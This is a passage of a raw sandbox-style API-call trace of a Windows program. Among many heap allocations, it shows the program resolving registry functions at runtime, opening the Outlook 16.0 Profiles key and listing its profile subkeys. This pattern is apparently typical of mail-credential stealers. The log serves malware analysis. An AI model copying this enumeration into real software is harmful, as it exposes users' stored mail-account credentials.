HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616ad0 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617210 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171c0 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617130 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616b10 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617140 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171d0 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617270 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.944] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.944] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x231f570 | out: phkResult=0x231f570*=0x1d0) returned 0x0 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.944] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.944] GetProcessHeap () returned 0x560000 [0186.944] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.945] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="0a0d020000000000c000000000000046") returned 0x0 [0186.945] lstrlenA (lpString="0a0d020000000000c000000000000046") returned 32 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.945] lstrcpyA (in: lpString1=0x613080, lpString2="0a0d020000000000c000000000000046" | out: lpString1="0a0d020000000000c000000000000046") returned="0a0d020000000000c000000000000046" [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x617130 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.945] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.945] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x1, lpName=0x231f6e0, cchName=0x400 | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a") returned 0x0 [0186.945] lstrlenA (lpString="13dbb0c8aa05101a9bb000aa002fc45a") returned 32 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.945] lstrcpyA (in: lpString1=0x613440, lpString2="13dbb0c8aa05101a9bb000aa002fc45a" | out: lpString1="13dbb0c8aa05101a9bb000aa002fc45a") returned="13dbb0c8aa05101a9bb000aa002fc45a" [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615da0 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130e0 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.945] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.945] GetProcessHeap () returned 0x560000 [0186.945] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.946] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.946] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x2, lpName=0x231f6e0, cchName=0x400 | out: lpName="2db91c5fd8470d46b1a5bc5efab4cae7") returned 0x0 [0186.946] lstrlenA (lpString="2db91c5fd8470d46b1a5bc5efab4cae7") returned 32 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.946] lstrcpyA (in: lpString1=0x6130b0, lpString2="2db91c5fd8470d46b1a5bc5efab4cae7" | out: lpString1="2db91c5fd8470d46b1a5bc5efab4cae7") returned="2db91c5fd8470d46b1a5bc5efab4cae7" [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x30) returned 0x613440 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613110 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613830 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6137a0 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130e0 | out: hHeap=0x560000) returned 1 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.946] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.946] GetProcessHeap () returned 0x560000 [0186.946] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.946] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x3, lpName=0x231f6e0, cchName=0x400 | out: lpName="3517490d76624c419a828607e2a54604") returned 0x0 [0186.947] lstrlenA (lpString="3517490d76624c419a828607e2a54604") returned 32 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.947] lstrcpyA (in: lpString1=0x613080, lpString2="3517490d76624c419a828607e2a54604" | out: lpString1="3517490d76624c419a828607e2a54604") returned="3517490d76624c419a828607e2a54604" [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616b90 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130e0 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613bc0 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613680 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613830 | out: hHeap=0x560000) returned 1 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x560000) returned 1 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.947] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.947] GetProcessHeap () returned 0x560000 [0186.947] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.947] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x4, lpName=0x231f6e0, cchName=0x400 | out: lpName="6c29d51f56390b45a924b3b787013a66") returned 0x0 [0186.948] lstrlenA (lpString="6c29d51f56390b45a924b3b787013a66") returned 32 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.948] lstrcpyA (in: lpString1=0x613440, lpString2="6c29d51f56390b45a924b3b787013a66" | out: lpString1="6c29d51f56390b45a924b3b787013a66") returned="6c29d51f56390b45a924b3b787013a66" [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x60) returned 0x619650 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613110 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6137a0 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613770 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613b60 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130e0 | out: hHeap=0x560000) returned 1 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613bc0 | out: hHeap=0x560000) returned 1 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613680 | out: hHeap=0x560000) returned 1 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b90 | out: hHeap=0x560000) returned 1 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.948] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.948] GetProcessHeap () returned 0x560000 [0186.948] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.948] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x5, lpName=0x231f6e0, cchName=0x400 | out: lpName="8503020000000000c000000000000046") returned 0x0 [0186.949] lstrlenA (lpString="8503020000000000c000000000000046") returned 32 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.949] lstrcpyA (in: lpString1=0x613440, lpString2="8503020000000000c000000000000046" | out: lpString1="8503020000000000c000000000000046") returned="8503020000000000c000000000000046" [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.949] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.949] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x6, lpName=0x231f6e0, cchName=0x400 | out: lpName="8763203907727d498bce4b981b157d7b") returned 0x0 [0186.949] lstrlenA (lpString="8763203907727d498bce4b981b157d7b") returned 32 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.949] lstrcpyA (in: lpString1=0x613440, lpString2="8763203907727d498bce4b981b157d7b" | out: lpString1="8763203907727d498bce4b981b157d7b") returned="8763203907727d498bce4b981b157d7b" [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x90) returned 0x610840 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130e0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613b00 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6138c0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613890 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613bf0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6139b0 [0186.949] GetProcessHeap () returned 0x560000 [0186.949] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6139e0 [0186.949] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613770 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613b60 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x619650 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.950] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.950] GetProcessHeap () returned 0x560000 [0186.950] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.950] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x7, lpName=0x231f6e0, cchName=0x400 | out: lpName="893893ade607c44aa338ac7df5d6cb42") returned 0x0 [0186.952] lstrlenA (lpString="893893ade607c44aa338ac7df5d6cb42") returned 32 [0186.952] GetProcessHeap () returned 0x560000 [0186.952] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.952] lstrcpyA (in: lpString1=0x613440, lpString2="893893ade607c44aa338ac7df5d6cb42" | out: lpString1="893893ade607c44aa338ac7df5d6cb42") returned="893893ade607c44aa338ac7df5d6cb42" [0186.952] GetProcessHeap () returned 0x560000 [0186.952] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.952] GetProcessHeap () returned 0x560000 [0186.952] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.952] GetProcessHeap () returned 0x560000 [0186.952] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.953] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.953] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x8, lpName=0x231f6e0, cchName=0x400 | out: lpName="9207f3e0a3b11019908b08002b2a56c2") returned 0x0 [0186.953] lstrlenA (lpString="9207f3e0a3b11019908b08002b2a56c2") returned 32 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.953] lstrcpyA (in: lpString1=0x613440, lpString2="9207f3e0a3b11019908b08002b2a56c2" | out: lpString1="9207f3e0a3b11019908b08002b2a56c2") returned="9207f3e0a3b11019908b08002b2a56c2" [0186.953] GetProcessHeap () returned 0x560000 [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.953] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.953] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x9, lpName=0x231f6e0, cchName=0x400 | out: lpName="9375CFF0413111d3B88A00104B2A6676") returned 0x0 [0186.953] lstrlenA (lpString="9375CFF0413111d3B88A00104B2A6676") returned 32 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613110 [0186.953] lstrcpyA (in: lpString1=0x613110, lpString2="9375CFF0413111d3B88A00104B2A6676" | out: lpString1="9375CFF0413111d3B88A00104B2A6676") returned="9375CFF0413111d3B88A00104B2A6676" [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd0) returned 0x6108e0 [0186.953] GetProcessHeap () returned 0x560000 [0186.953] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613440 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613a10 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613bc0 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613950 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613a40 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6138f0 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613b30 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613980 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613770 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613aa0 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613b00 | out: hHeap=0x560000) returned 1 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6138c0 | out: hHeap=0x560000) returned 1 [0186.954] GetProcessHeap () returned 0x560000 [0186.954] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613890 | out: hHeap=0x560000) returned 1 [0186.954] GetProcessHeap () returned 0x560000 [0186.956] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613bf0 | out: hHeap=0x560000) returned 1 [0186.956] GetProcessHeap () returned 0x560000 [0186.956] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6139b0 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130e0 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.957] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.957] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0xa, lpName=0x231f6e0, cchName=0x400 | out: lpName="dc48e7c6d33441458035ee20beefe18a") returned 0x0 [0186.957] lstrlenA (lpString="dc48e7c6d33441458035ee20beefe18a") returned 32 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.957] lstrcpyA (in: lpString1=0x613080, lpString2="dc48e7c6d33441458035ee20beefe18a" | out: lpString1="dc48e7c6d33441458035ee20beefe18a") returned="dc48e7c6d33441458035ee20beefe18a" [0186.957] GetProcessHeap () returned 0x560000 [0186.957] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130b0 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.957] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.957] GetProcessHeap () returned 0x560000 [0186.957] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.958] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0xb, lpName=0x231f6e0, cchName=0x400 | out: lpName="e57f6d0b27b6134693ca7113a4ab34a6") returned 0x0 [0186.958] lstrlenA (lpString="e57f6d0b27b6134693ca7113a4ab34a6") returned 32 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.958] lstrcpyA (in: lpString1=0x613080, lpString2="e57f6d0b27b6134693ca7113a4ab34a6" | out: lpString1="e57f6d0b27b6134693ca7113a4ab34a6") returned="e57f6d0b27b6134693ca7113a4ab34a6" [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6130e0 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.958] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 